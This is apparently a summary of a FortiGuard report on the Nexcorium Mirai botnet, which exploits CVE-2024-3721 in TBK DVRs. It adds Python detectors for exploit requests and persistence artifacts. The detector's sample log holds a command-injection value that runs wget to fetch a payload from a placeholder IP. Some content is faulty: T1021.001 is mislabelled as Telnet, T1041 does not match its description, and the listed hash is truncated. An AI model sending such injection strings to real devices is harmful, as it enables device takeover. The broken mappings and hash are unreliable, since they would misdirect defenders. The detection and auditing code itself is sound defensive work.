Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign

FortiGuard Labs analyzed a campaign exploiting CVE-2024-3721 in TBK DVR-4104 and DVR-4216 devices to install the multi-architecture Mirai variant Nexcorium, which uses downloader scripts, persistence tricks, brute-force login attempts, and DDoS modules. The activity is likely linked to the suspected “Nexus Team” threat actor, identified by a custom X-Hacked-By header and infrastructure including r3brqw3d[.]b0ats[.]top. #CVE-2024-3721 #Nexcorium #NexusTeam #TBKDVR-4104 #TBKDVR-4216 #r3brqw3d.b0ats.top

Key points

  • FortiGuard Labs observed attackers exploiting CVE-2024-3721, an OS command injection flaw in TBK DVR devices.
  • The exploit delivered a downloader script named dvr that fetched Nexcorium samples for ARM, MIPS R3000, and x86-64 systems.
  • The campaign used a custom HTTP header, X-Hacked-By: Nexus Team – Exploited By Erratic, suggesting a likely link to the “Nexus Team” actor.
  • Nexcorium is a multi-module Mirai variant with watchdog, scanner, and attacker components, plus XOR-encoded configuration data.
  • The malware includes brute-force credentials, Telnet-based scanning/login behavior, and an exploit for CVE-2017-17215 targeting Huawei HG532 devices.
  • Persistence is achieved through /etc/inittab, /etc/rc.local, systemd service creation, crontab, and relocation to /usr/local/bin/sysd.
  • The botnet supports multiple DDoS attack modes and connects to the C2 domain r3brqw3d[.]b0ats[.]top to receive commands.
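The key points above describe two network-visible traits of the campaign: requests that abuse the mdb/mdc arguments of the DVR web interface, and the custom X-Hacked-By header. The following Python is an added example (not code from the FortiGuard report) that flags those traits in HTTP request log lines. The log lines, the endpoint path /device.cgi and the addresses in them are constructed for the example, not taken from the report.

```python
"""Flag DVR exploitation attempts in HTTP request logs (added defender example).

Each constructed log line is: request line, then headers, joined with '|'.
Signals checked (all from the report's description):
  - shell metacharacters inside the mdb / mdc query parameters
  - the X-Hacked-By header used by the campaign
  - references to the nexuscorp payload name
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines; /device.cgi is a placeholder path, 203.0.113.9 / 192.0.2.10 are documentation IPs.
SAMPLE_REQUESTS = [
    'GET /device.cgi?mdb=sos&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.9%2Fdvr HTTP/1.1'
    '|Host: 192.0.2.10|X-Hacked-By: Nexus Team - Exploited By Erratic',
    'GET /index.html HTTP/1.1|Host: 192.0.2.10|User-Agent: Mozilla/5.0',
    'GET /device.cgi?mdb=sos&mdc=nexuscorp HTTP/1.1|Host: 192.0.2.10|User-Agent: curl/8.0',
]

SHELL_META = re.compile(r'[;|&`$]')                      # command separators / substitution
HEADER_RE = re.compile(r'^X-Hacked-By:\s*(.*)$', re.IGNORECASE)
WATCHED_PARAMS = ('mdb', 'mdc')                          # parameters abused per the report


def analyze_request(line):
    """Return a list of human-readable findings for one log line (empty if clean)."""
    request_line, *headers = line.split('|')
    findings = []

    parts = request_line.split(' ')
    if len(parts) >= 2:
        query = parse_qs(urlsplit(parts[1]).query)      # parse_qs percent-decodes values
        for param in WATCHED_PARAMS:
            for value in query.get(param, []):
                if SHELL_META.search(value):
                    findings.append(f'shell metacharacters in {param} parameter')

    for header in headers:
        match = HEADER_RE.match(header.strip())
        if match:
            findings.append(f'X-Hacked-By header present: {match.group(1)}')

    if 'nexuscorp' in line.lower():
        findings.append('reference to nexuscorp payload name')

    return findings


def scan_log(lines):
    """Map line index -> findings for every line that triggered at least one signal."""
    return {i: f for i, line in enumerate(lines) if (f := analyze_request(line))}


if __name__ == '__main__':
    for idx, hits in scan_log(SAMPLE_REQUESTS).items():
        print(f'line {idx}: ' + '; '.join(hits))
```

Feed real access-log lines in the same request-line|header format (or adapt the split to your log layout); a hit on the header alone is high confidence, while the metacharacter check on mdb/mdc is the broader signal for exploitation attempts against CVE-2024-3721 that omit the header.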

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attackers gained initial access by exploiting the DVR command injection flaw in exposed devices. [‘exploiting CVE-2024-3721 … through manipulation of the mdb / mdc arguments’]
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – A downloader script and later commands were executed on the victim device. [‘delivered a downloader script’, ‘executes commands to check if it gets a shell’]
  • [T1105] Ingress Tool Transfer – The downloader fetched malware samples from remote infrastructure. [‘fetches malware samples with filenames starting with nexuscorp’]
  • [T1027] Obfuscated Files or Information – The malware stored configuration and exploit material using XOR encoding. [‘XOR-Encoded configuration with the key 0x13’, ‘XOR-Encoded configuration with the key 0xFD’]
  • [T1053.003] Scheduled Task/Job: Cron – Nexcorium created a crontab entry to survive reboot. [‘It creates a scheduled task using crontab to ensure it runs after reboot’]
  • [T1053.006] Scheduled Task/Job: Systemd Service – The malware created a persistent systemd service. [‘creates a service file at /etc/systemd/system/persist.service, enabling it to run automatically at startup’]
  • [T1547.001] Registry Run Keys / Startup Folder – Not applicable (no registry on these devices); startup persistence was instead achieved via init and startup scripts. [‘It updates /etc/inittab’, ‘It creates or updates /etc/rc.local’]
  • [T1057] Process Discovery – The malware checked running state and execution context, including subprocess role markers and shell validation. [‘uses the string NXS_WD_CHILD’, ‘including system, shell, sh, and cat /bin/busybox’]
  • [T1082] System Information Discovery – Nexcorium parsed victim architecture to ensure the right payload and behavior. [‘parse and verify the victim host’s architecture’]
  • [T1036] Masquerading – The malware copied itself to a benign-looking path and name for persistence. [‘copies itself to /usr/local/bin/sysd’]
  • [T1070.004] File Deletion – It removed its original binary to evade analysis. [‘The malware deletes its original binary from the current execution path’]
  • [T1110] Brute Force – The malware used a hard-coded username/password list and Telnet logins. [‘starts a brute-force attack using the previous wordlist’]
  • [T1498] Network Denial of Service – Nexcorium supported multiple flood-based DDoS attacks. [‘UDP flood, TCP ACK flood, TCP SYN flood … VSE query flood’]
  • [T1041] Exfiltration Over C2 Channel – The bot received commands from a command-and-control server over the network. [‘parses commands retrieved from the C2 server’]
  • [T1021.001] Remote Services: Telnet – Victim hosts opened Telnet connections for brute-force login attempts. [‘The malware scan involves the victim’s hosts opening a Telnet connection’]
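The persistence entries in the mapping above (cron, systemd, /etc/inittab, /etc/rc.local, and the relocated copy at /usr/local/bin/sysd) are all host artifacts a responder can check directly. The Python below is an added example (not code from the report) that audits a snapshot of those files for references to the relocation path and for the persist.service unit name. The sample file contents are constructed for the example; `load_from_disk` reads the same paths from a live host.

```python
"""Audit Linux startup locations for the Nexcorium persistence artifacts (added defender example).

Checks, all taken from the report's description of the malware:
  - a file present at the relocation path /usr/local/bin/sysd
  - a systemd unit named persist.service
  - any startup file (inittab, rc.local, cron, systemd units) referencing the relocation path
"""
import os

SUSPECT_BINARY = '/usr/local/bin/sysd'                       # relocation path named in the report
SYSTEMD_UNIT = '/etc/systemd/system/persist.service'         # unit name named in the report
STARTUP_FILES = ('/etc/inittab', '/etc/rc.local', '/etc/crontab')
STARTUP_DIRS = ('/etc/systemd/system/', '/var/spool/cron/', '/etc/cron.d/')

# Constructed sample snapshot (path -> contents); this is what an infected host might look like,
# written for the example rather than copied from a real system.
SAMPLE_FS = {
    '/etc/inittab': '::sysinit:/etc/init.d/rcS\n::respawn:/usr/local/bin/sysd\n',
    '/etc/rc.local': '#!/bin/sh\n/usr/local/bin/sysd &\nexit 0\n',
    '/etc/systemd/system/persist.service': (
        '[Unit]\nDescription=persist\n[Service]\nExecStart=/usr/local/bin/sysd\n'
        '[Install]\nWantedBy=multi-user.target\n'
    ),
    '/var/spool/cron/crontabs/root': '@reboot /usr/local/bin/sysd\n',
    '/usr/local/bin/sysd': '<binary contents omitted>',
    '/etc/hostname': 'dvr\n',
}


def is_startup_file(path):
    """True for files whose contents are executed at boot (and so matter for persistence)."""
    return path in STARTUP_FILES or path.startswith(STARTUP_DIRS)


def audit_persistence(fs):
    """Return a list of (path, reason) findings for a path -> contents snapshot."""
    findings = []
    if SUSPECT_BINARY in fs:
        findings.append((SUSPECT_BINARY, 'file present at relocation path'))
    if SYSTEMD_UNIT in fs:
        findings.append((SYSTEMD_UNIT, 'systemd unit name used by the campaign'))
    for path, content in fs.items():
        if not is_startup_file(path):
            continue
        for lineno, line in enumerate(content.splitlines(), 1):
            if SUSPECT_BINARY in line:
                findings.append((path, f'line {lineno} references {SUSPECT_BINARY}'))
    return findings


def load_from_disk(extra_dirs=STARTUP_DIRS):
    """Build a snapshot from the live host: fixed startup files plus every file under the startup dirs."""
    fs = {}
    paths = list(STARTUP_FILES) + [SUSPECT_BINARY, SYSTEMD_UNIT]
    for d in extra_dirs:
        for root, _dirs, names in os.walk(d):
            paths.extend(os.path.join(root, n) for n in names)
    for p in paths:
        if os.path.isfile(p):
            try:
                with open(p, 'r', errors='replace') as fh:
                    fs[p] = fh.read()
            except OSError:
                continue
    return fs


if __name__ == '__main__':
    snapshot = SAMPLE_FS  # replace with load_from_disk() to audit the running host
    for path, reason in audit_persistence(snapshot):
        print(f'{path}: {reason}')
```

Because the report also describes the malware deleting its original binary and renaming itself to sysd, the audit keys on the destination path rather than on the original filename; on a real host, confirm any hit by hashing the file at /usr/local/bin/sysd and comparing against the hashes in the Indicators of Compromise section.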

Indicators of Compromise

  • [IP addresses] C2/infrastructure and observed hosts – 84[.]200[.]87[.]36, 176[.]65[.]148[.]186, and 1 other item
  • [Domains] command-and-control domain – r3brqw3d[.]b0ats[.]top
  • [File names] downloader and malware samples – dvr, nexuscorp.x86
  • [File hashes] detected samples in the report – 96aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35
  • [Vulnerability IDs] exploited and included exploit – CVE-2024-3721, CVE-2017-17215


Read more: https://feeds.fortinet.com/~/953946956/0/fortinet/blog/threat-research~Tracking-Mirai-Variant-Nexcorium-A-VulnerabilityDriven-IoT-Botnet-Campaign